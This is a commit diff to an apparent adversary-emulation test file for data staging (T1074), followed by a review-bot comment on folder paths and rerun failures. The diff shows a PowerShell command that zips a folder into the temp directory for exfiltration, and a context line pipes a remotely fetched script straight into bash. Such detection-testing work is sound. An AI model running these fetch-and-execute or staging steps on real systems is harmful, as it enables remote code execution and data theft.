Updated atomic test 3 for better alignment with T1074 (Staging) (#763)
Test was written previously for T1022 and then moved here; T1022 already has very similar tests, but it is useful here so just reworded test 3.
@@ -29,15 +29,15 @@ atomic_tests:
|
||||
command: |
|
||||
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
|
||||
|
||||
- name: Zip a Folder with PowerShell
|
||||
- name: Zip a Folder with PowerShell for Staging in Temp
|
||||
description: |
|
||||
use living off the land tools to encrypt and zip a file for exfiltration
|
||||
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_encrypt -DestinationPath $env:TEMP\Folder_to_encrypt.zip
|
||||
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
|
||||
cleanup_command: |
|
||||
Remove-Item -Path $env:TEMP\Folder_to_encrypt.zip
|
||||
Remove-Item -Path $env:TEMP\Folder_to_zip.zip
|
||||
|
||||
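Review bot: The new `command` line reads from `$PathToAtomicsFolder\T1074\bin\Folder_to_zip`, but the visible hunk only changes the YAML. Unless the sample directory under `T1074\bin` is renamed from `Folder_to_encrypt` in the same commit, `Compress-Archive` will fail on a missing source path. Please confirm the rename is included, or keep the old folder name in `-Path` and change only the archive name. Separately, `Compress-Archive` errors when `$env:TEMP\Folder_to_zip.zip` already exists, so a rerun without cleanup fails. Adding `-Force` to the command and `-ErrorAction Ignore` to the `Remove-Item` in `cleanup_command` would make the test repeatable.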